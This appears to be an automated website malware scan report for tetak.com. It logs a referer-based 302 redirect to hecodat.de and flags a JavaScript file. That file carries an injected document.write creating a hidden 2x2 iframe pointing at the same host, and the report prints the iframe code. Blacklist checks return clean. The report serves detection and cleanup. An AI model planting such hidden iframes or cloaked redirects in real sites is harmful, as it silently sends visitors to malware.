Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tetak.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tetak.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 03 Sep 2014 02:29:23 GMT Location: http://hecodat.de/zwmd.html?h=931129 Server: Apache Content-Length: 279 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tetak.com/ | 200 OK Content-Length: 41745 Content-Type: text/html | clean |
http://tetak.com/iepngfix_tilebg.js | 200 OK Content-Length: 3826 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=931129></iframe>');
if (!window.IEPNGFix) { window.IEPNGFix = {}; } IEPNGFix.tileBG = function(elm, pngSrc, ready) { var data = this.data[elm.uniqueID], elmW = Math.max(elm.clientWidth, elm.scrollWidth), elmH = Math.max(elm.clientHeight, elm.scrollHeight), bgX = elm.currentStyle.backgroundPositionX, if (elm.firstChild) { elm.insertBefore(d, elm.firstChild); } else { elm.appendChild(d); } } this.fix(d, pngSrc, 0); count++; } } } while (count < tiles.cache.length) { this.fix(tiles.cache[count], '', 0); tiles.cache[count++].style.display = 'none'; } this.hook.enabled = 1; tiles.old = { w: elmW, h: elmH, x: bgX, y: bgY, r: bgR }; }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=931129 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=931129> | ||
http://mwximage.com/327864.js | 404 Not Found Content-Length: 19 Content-Type: text/html | clean |
http://mwximage.com/test404page.js | 404 Not Found Content-Length: 19 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tetak.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tetak.com/
Result: tetak.com is not infected or malware details are not published yet.
Result: tetak.com is not infected or malware details are not published yet.